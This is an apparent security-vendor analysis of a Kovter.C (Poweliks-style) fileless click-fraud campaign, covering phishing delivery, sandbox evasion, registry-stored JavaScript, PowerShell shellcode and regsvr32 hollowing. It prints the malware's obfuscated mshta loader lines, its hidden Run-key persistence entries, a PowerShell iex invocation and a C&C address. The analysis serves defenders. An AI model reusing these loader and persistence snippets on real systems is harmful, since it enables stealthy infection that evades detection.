Poweliks (actually we should say Kovter) is a well-known and studied click-fraud malware that made its first appearance in early August 2014, it became famous very quickly due the fact that it used a persistence mechanism that allowed it to be fileless on disk, taking advantage of the Windows Registry and also because it adopted new techniques to stay persistent on the system. Its evolution apparently never stopped, in this post we will analyze what appears to be a new strain of the malware with an incredibly low detection rate.
Summary
We have been monitoring a campaign targeting the USA at least since July 2015 that’s using the well-known poweliks file-less malware to evade antivirus detections. The malware is a possible evolution of poweliks created with the purpose of keeping a low profile: as opposed to previous strains, this one doesn’t seem to take advantage of exploits or UAC bypasses techniques but its effectiveness remains equally high and the detection rate is extremely low. Behavioral analysis proves to be extremely effective against this type of threat, keeping the endpoints protected in the timeframe required by the AV companies to correctly identify it.
Update 1
We want to thank Kafeine, FireF0x and Horgh_rce for pointing out that the malware is actually Kovter.C that ripped off Powelik’s loader. A dump of the configuration provided by Horgh_rce can be found on this pastebin.
Delivery
One of our customers received the following email that pretends to be a receipt for an American Airlines ticket to Long Beach.
The email originates from what appears to be a compromised domain: mrsfitness [.] com
Even in this case neither the anti-spam nor the antivirus system installed on the gateway did notice anything suspicious. The attachment contains an obfuscated javascript that triggers the download and execution of a malicious executable.
We have been monitoring this campaign since late July, emails received took three different forms:
- Airfare ticket receipts
- EZ-Pass invoices
- Notice to appear in court
The main target being the USA.
Payload
The downloaded file is encrypted and the code is convoluted in order to slow down the analysis, in addition to that it targets specifically VirtualBox in order to successfully bypass sandbox analyses.
Filename: 88655116.exe
Hash-SHA256: 673b384836483b3db628e3cc2eda5683a209837ea7da0a4c0749ea496e2a644a
Size: 412.210
Detection rate is still extremely low and the malware is apparently misclassified.
After starting up the malware unpacks and checks for the presence of a VirtualBox VM, a behavior we didn’t notice previously in the same campaign. The second stage creates two random registry keys and then it spawns an instance of powershell through mshta.exe that, in turn, is used to spawn an injected instance of regsvr32.exe. These are the registry keys:
The commandline of mshta.exe contains a small javascript:
ZKk7pWSkz=”3pVjfxK58″;Z6v7=new%20ActiveXObject(“WScript.Shell”);qojKj0pk=”McEb”;sEAn4=Z6v7.RegRead(“HKCU\\software\\ZiqReaBa\\Xp20Zk”);mAN16NzLz=”nmOa4g1u”;eval(sEAn4);UtbW0ZYxq=”R5V5xTB”;
we can easily deobfuscate it to understand its real purpose.
its function is to read the newly created registry key and then run its content, which turns out to be another javascript, shown below after the necessary deobfuscation:
The function of this javascript is to decrypt a binary string and run it. The string has been removed from the script due to its length but it can be retrieved on this pastebin for further analyses.
The decrypted version reveals a powershell script that creates a thread from a shellcode embedded inside the script itself.
The script is pushed inside an environment variable that is then passed directly to powershell:
“C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe” iex $env:vsxf
We’ve made the full deobfuscated script available for analysis. So what’s the purpose of the shellcode? In order to find out we have to disassemble and debug it. The function of the shellcode is to resolve a few APIs (VirtualAlloc(), ExitProcess(), RegOpenKey(), RegQueryValue(), GetProcAddress(), LoadLibrary()) that will be used to read the content of the aforementioned registry keys, decrypt their content and run it. The decryption routine is quite simple and it takes advantage of a permutation table containing incremental values from 1 to 0x100 that are used to XOR the encrypted bytes:
The code is decrypted and run. It executes and hollows regsvr32.exe as it can be seen from the output of our analysis engine:
This is the situation on the operating system after the impersonation has been completed.
Poweliks doesn’t come without a fallback mechanism, should things go wrong, in fact if the process just described fails for some reason, the main process tries to spawn directly an instance of regsvr32.exe for a last resort attempt at injecting it.
After Powershell terminates, we are left with one instance of regsvr32.exe running whose job is to spawn a second instance of itself, duly injected, that is used for several things: first of all the malware becomes persistent with a simple key installed in HKCU/Software/Microsoft/Windows/CurrentVersion/Run but it uses a simple parsing trick to make its persistence keys not readable directly from regedit.exe:
The keys used are the following one, notice the leading backslash in the key’s name:
“\0a1f309e8″=”mshta javascript:judNSd2v=”4S”;T80G=new%20ActiveXObject(“WScript.Shell”);OlXOQ8j4=”jWqM4PKDvF”;pd6D2R=T80G.RegRead(“HKCU\\software\\ZiqReaBa\\Xp20Zk”);qeV4j2Wz=”Y7wjctoseg”;eval(pd6D2R);WFNQgoB1b=”idEjYnCb”;”
“\09460666d”=”mshta javascript:Zfvtt1o3=”uue”;m3S=new%20ActiveXObject(“WScript.Shell”);tMAUk0Ua=”Zc8″;Qs4Xs3=m3S.RegRead(“HKCU\\software\\ZiqReaBa\\Xp20Zk”);q9FywZTi=”X”;eval(Qs4Xs3);XFCt5IgZO=”IGrWu”;”
Even without deobfuscation it’s clear that they are starting the same infection process again using mshta with a javascript that points to the content in the registry. Poweliks is not exactly a file-less malware, but it gets very close to the concept. After persistence is gained, some new registry keys are added, in particular a random user-agent is set and reused for its requests:
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
The user-agent is chose among a list of several others:
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
At this point browser injections begins and the unfortunate user will be presented with new ads and fake alerts, poweliks maintains its downloading capabilities, so it theory any number of other threats can be downloaded once the computer is infected. So far we’ve monitored the access to one single C&C server: h**p://185.102.139.93/form2.php. Even though a long list of IPs is embedded into the binary, we didn’t investigate further but they might be rogue AD servers.
Conclusions
IOCs
C&C IP address: 185.102.139.93
Join our newsletter to get the world’s latest security events and our technical analyses delivered directly to your inbox!
ReaQta